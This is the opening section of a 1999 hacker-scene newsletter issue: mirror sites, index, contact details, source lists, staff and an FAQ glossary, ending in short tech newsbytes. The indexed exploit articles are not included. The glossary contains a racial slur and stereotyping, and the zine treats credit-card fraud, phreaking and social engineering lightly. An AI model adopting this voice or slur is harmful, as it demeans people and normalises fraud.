[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                        <=-[ HWA.hax0r.news ]-=>                        =
==========================================================================
[=HWA'99=]                         Number 33 Volume 1 1999 Sept 12th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Well http://welcome.to/HWA.hax0r.news/ is back up and working!! I shoulda
mentioned it in #32 but what can I say? I fucked up and left the message
there from the week before, boy is my face red. ;^, - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative.

Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns. In the past I've endeavoured
to format all text to 80 cols except for articles and site statements and
urls which are posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in 1024x768 mode with
UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

  http://www.sysbreakers.com/hwa
  http://www.attrition.org/hosted/hwa/
  http://www.ducktank.net/hwa/issues.html.
  http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
  http://hwazine.cjb.net/
  http://www.hackunlimited.com/files/secu/papers/hwa/
  http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

  http://www.csoft.net/~hwa
  http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
  http://www.attrition.org/hosted/hwa/
  http://www.attrition.org/~modify/texts/zines/HWA/
  http://www.ducktank.net/hwa/issues.html. ** NEW **
  http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
  http://www.csoft.net/~hwa/
  http://www.digitalgeeks.com/hwa. *DOWN*
  http://members.tripod.com/~hwa_2k
  http://welcome.to/HWA.hax0r.news/
  http://www.attrition.org/~modify/texts/zines/HWA/
  http://archives.projectgamma.com/zines/hwa/.
  http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ
or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour of
love and will be continued for as long as I feel like it, i'm not motivated
by dollars or the illusion of fame, did you ever notice how the most
famous/infamous hackers are the ones that get caught? there's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=

                   Welcome to HWA.hax0r.news ... #33

=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ...
someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=--------------------------------------------------------------------------=
Issue #33
=--------------------------------------------------------------------------=

[ INDEX ]

=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. NSA Key Found in Windows
04.0 .. Online Gambling is not Secure
05.0 .. Zyklon Pleads Guilty
06.0 .. Mitnick Transferred to Lompoc Federal Prison
07.0 .. C-Span Web Site Defaced
08.0 ..
killsentry.c a Port Sentry killer by Vortexia
09.0 .. W. Richard Stevens dead at 48
10.0 .. New Palm Pilot RedBox for Canada is Released
11.0 .. Windows2000test Suffers Attack
12.0 .. Flex-LM Security Breached
13.0 .. Customers of Numerous ISPs Victims of Fraud
14.0 .. Air Force Asks to Preserve 'Panther Den'
15.0 .. $19.6 Million Awarded to Create DOD IDS
16.0 .. UK Plans Super Group to Crack Crypto
17.0 .. Nationwide Identity Database Plans Started in 1997
18.0 .. Game Boy Advance to Connect to the Internet
19.0 .. South African Security Industry goes Loco over Portscan
20.0 .. Owner of ZANet IRC Network runs into trouble
21.0 .. Global Hell Expose
22.0 .. "NSA" key in Microsoft CryptoAPI
23.0 .. 9999 - Hey! That's today!
24.0 .. US Chinese Embassy Defaced
25.0 .. Scottish Executive Site Defaced - After Warning
26.0 .. Cholera Outbreak Expected
27.0 .. Web Email Vulnerable?
28.0 .. Cyber Terrorism - US Biggest Threat
29.0 .. Philippine Gov Scared of Cyber Terrorists
30.0 .. US Sen. Warns of Cyber Attack Along with Y2K
31.0 .. JPEG Steals ICQ Passwords
32.0 .. BackDoor in Windows Found
33.0 .. HERF Gun Demonstrated at InfowarCon
34.0 .. GNU Launches Free Encryption Tool
35.0 ..
Fringe Goes Offline
36.0 .. IACSP Defaced
37.0 .. RUSSIAN HACKERS REPORTEDLY ACCESSED US MILITARY SECRETS
38.0 .. NET PRIVACY STUDY INCLUDED IN RD BILL
39.0 .. SCENE RELATIONS
40.0 .. L0PHT HEAVY INDUSTRIES PROFILED
41.0 .. SUMMIT TALKS FOCUS ON E-COMMERCE SAFETY
42.0 .. SECURITY SOLUTIONS
43.0 .. HTTP://WWW.KKK.COM HIJACKED
44.0 .. MS ORDERS SECURITY AUDIT AFTER HOTMAIL BREACH
45.0 .. EMBASSY CRACKER MAY BE PLAYING GOVERNMENTS' GAME
46.0 .. CYBER-CORPS TO PROTECT FEDERAL COMPUTERS
47.0 .. WINDOWS2000 BETA 3 BACKDOOR
48.0 .. AMERICAN EXPRESS AND E-COMMERCE
49.0 .. BUSINESS TOO TRUSTING OF E-MAIL
50.0 .. SCOTTISH HACKERS DECLARE WAR ON WALES
51.0 .. V-ONE AND RED HAT IN SECURITY PACT
52.0 .. HACKERS DEFACE HACKER'S SITE
53.0 .. How to penetrate Universities in less than an hour
54.0 .. Biometrics, busting hackers by sense of smell
55.0 .. HP Security Bulletin: Vulnerability in rpc.cmsd
56.0 .. Microsoft Bulletin: "Fragmented IGMP Packet" Vulnerability
57.0 .. Microsoft Bulletin: ActiveX Script Vulnerability
58.0 .. Trend Micro: W97M_60thSKEPTIC virus
59.0 .. The story of MAX the AI (part 2, final episode)
60.0 .. AOLwatch

=--------------------------------------------------------------------------=

AD.S ..
          Post your site ads or etc here, if you can offer something in
          return thats tres cool, if not we'll consider ur ad anyways so
          send it in. ads for other zines are ok too btw just mention us
          in yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send
          in your suggestions and ads now...n.b date and time may be pushed
          back join mailing list for up to date information.
          Current dates: POSTPONED til further notice, place: TBA..

Ha.Ha  .. Humour and puzzles

          Hey You!
          =------=
          Send in humour for this section! I need a laugh and its hard to
          find good stuff... ;)

SITE.1 .. Featured site,
H.W    .. Hacked Websites
A.0    .. APPENDICES
A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING.
LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link
is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE
DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic
dog droppings, or fake vomit thanks.

Send all goodies to:

    HWA NEWS
    P.O BOX 44118
    370 MAIN ST. NORTH
    BRAMPTON, ONTARIO
    CANADA
    L6V 4H5

WANTED!: POSTCARDS! YESH!
POSTCARDS, I COLLECT EM so I know a lot of you are reading this from some
interesting places, make my day and get a mention in the zine, send in a
postcard, I realize that some places it is cost prohibitive but if you have
the time and money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of residence for my
collection, I collect stamps too so you kill two birds with one stone by
being cool and mailing in a postcard, return address not necessary, just a
"hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
  ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
  compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine .................
http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

    http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list`s charter. I will allow
certain informational posts regarding updates to security tools, documents,
etc. But I will not tolerate any unnecessary or nonessential "noise" on
this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without
your permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net .............
currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Steven Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book. Its almost like buying a clue. Anyway..on with the show ..

- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't
be reprinted unless changed in a big way with the exception of the
following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA   - see EoA ;-)

!=     - Mathematical notation "is not equal to" or "does not equal"
         ASC(247) "wavey equals" sign means "almost equal" to. If written
         an =/= (equals sign with a slash thru it) also means !=, =< is
         Equal to or less than and => is equal to or greater than (etc,
         this aint fucking grade school, cripes, don't believe I just typed
         all that..)

AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or
         <21)

AOL    - A great deal of people that got ripped off for net access by a
         huge clueless isp with sekurity that you can drive buses through,
         we're not talking Kung-Fu being none too good here, Buy-A-Kloo
         maybe at the least they could try leasing one??

*CC    - 1 - Credit Card (as in phraud)
         2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC    - Chaos Computer Club (Germany)

*CON   - Conference, a place hackers crackers and hax0rs among others go to
         swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear,
         get drunk watch videos and seminars, get drunk, listen to
         speakers, and last but not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
         hacker speak he's the guy that breaks into systems and is often
         (but by no means always) a "script kiddie" see pheer
         2 . An edible biscuit usually crappy tasting without a nice dip,
         I like jalapeno pepper dip or chives sour cream and onion, yum
         - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
         Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
         ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC    - End of Commentary

EoA    - End of Article or more commonly @HWA

EoF    - End of file

EoD    - End of diatribe (AOL'ers: look it up)

FUD    - Coined by Unknown and made famous by HNN - "Fear uncertainty and
         doubt", usually in general media articles not high brow articles
         such as ours or other HNN affiliates ;)

du0d   - a small furry animal that scurries over keyboards causing people
         to type weird crap on irc, hence when someone says something
         stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see
         HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
         difficult to define, I think it is best defined as pop culture's
         view on The Hacker ala movies such as well erhm "Hackers" and The
         Net etc... usually used by "real" hackers or crackers in a
         derogatory or slang humorous way, like 'hax0r me some coffee?' or
         can you hax0r some bread on the way to the table please?'
         2 - A tool for cutting sheet metal.

HHN    - Maybe a bit confusing with HNN but we did spring to life around
         the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
         HNN as a proper noun means the hackernews site proper. k? k.
         ;&

HNN    - Hacker News Network and its affiliates
         http://www.hackernews.com/affiliates.html

J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC    - Depends on context: No Further Comment or No Fucking Comment

NFR    - Network Flight Recorder (Do a websearch) see 0wn3d

NFW    - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer

*OFCS  - Oh for christ's sakes

PHACV  - And variations of same
         Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus,
         Warfare

         Alternates: H - hacking, hacktivist
                     C - Cracking
                     C - Cracking
                     V - Virus
                     W - Warfare
                     A - Anarchy (explosives etc, Jolly Roger's Cookbook
                         etc)
                     P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your
         presence see 0wn3d

*RTFM  - Read the fucking manual - not always applicable since some manuals
         are pure shit but if the answer you seek is indeed in the manual
         then you should have RTFM you dumb ass.

TBC    - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA    - To Be Arranged/To Be Announced also 2ba

TFS    - Tough fucking shit.

*w00t  - 1 - Reserved for the uber ereet, noone can say this without severe
         repercussions from the underground masses. also "w00ten"
         2 - Cruciphux and sAs72's second favourite word (they're both shit
         stirrers)

*wtf   - what the fuck, where the fuck, when the fuck etc ..

*ZEN   - The state you reach when you *think* you know everything (but
         really don't) usually shortly after reaching the ZEN like state
         something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like
to see more reader input, help me out here, whats good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ STOCKS GOING HIGH From Help Net Security http://www.net-security.org/ by BHZ, Saturday 11th September 1999 on 1:46 am CET Red Hat (www.redhat.com) stock are going high into the sky. Frank Batten Jr., Red Hat's largest investor and the has seen his 15 million shares in the company rised from $1 billion to enormous $1.84 billion (current stock price today is $122.81). ++ LINUX TODAY MAILING LIST From Help Net Security http://www.net-security.org/ by BHZ, Friday 10th September 1999 on 3:25 am CET Linux Today (www.linuxtoday.com) announced new mailing list today. If you subscribe you will get a newsletter, which will cover linux news and alerts, directly in your mailbox. http://linuxtoday.com/createaccount.php3. ++ UNIX-VIRUS MAILING LIST From Help Net Security http://www.net-security.org/ by BHZ, Wednesday 8th September 1999 on 5:37 pm CET Interested in Unix viruses? Join the unix-virus mailing list which was created to discuss virus in the unix environment. 
If you want to subscribe send a message with "subscribe unix-virus" in the body of the message to majordomo@virus.beergrave.net. ++ Still no sign of http://www.securify.com/packetstorm/ .... ++ LUCENT'S HIGH-SPEED 'STINGER' (BUS. 7:30 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21609.html The company says its new product will allow ISPs and local phone companies to offer DSL service without compromising voice-service quality. Says one analyst: "The 800-pound gorilla is entering the business." ++ CZECHS CHARGE TO CASH IN ON NET (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/21584.html The Czech Republic is ever ... so ... slowly entering the technology age. Netrepreneurs take some flak, but they push on undaunted. Steve Kettmann reports from Prague. ++ RED, HOT, AND HYPERLINKED (BUS. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21596.html With a bilingual version of WebTV and the possibility of building an ambitious fiber-optic link, the island of Cuba may soon be fully connected. By Vito Echevarria. ++ SUN TRIES NET APPLIANCE, AGAIN (BUS. 7:35 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21633.html In the world of dumbed-down computers, they don't get any dumber than the Sun Ray. And that's the idea, Sun says: Let the network do the work. ++ CONNECTING ASIA (BUS. 7:35 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21632.html Global Crossing, Microsoft, and Softbank say an 11,000-mile, US$1.3 billion telecom network will bring broadband services to Asia. Also: Concentric is buying a British ISP.... Lycos acquiring Quote.com for $78.3 million.... And more. ++ SILICON VALLEY GOES SOUTH (CULT. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/culture/story/21630.html Hollywood decidedly goes tech, and it's got the conference to prove it: the first annual Digital Coast Conference. 
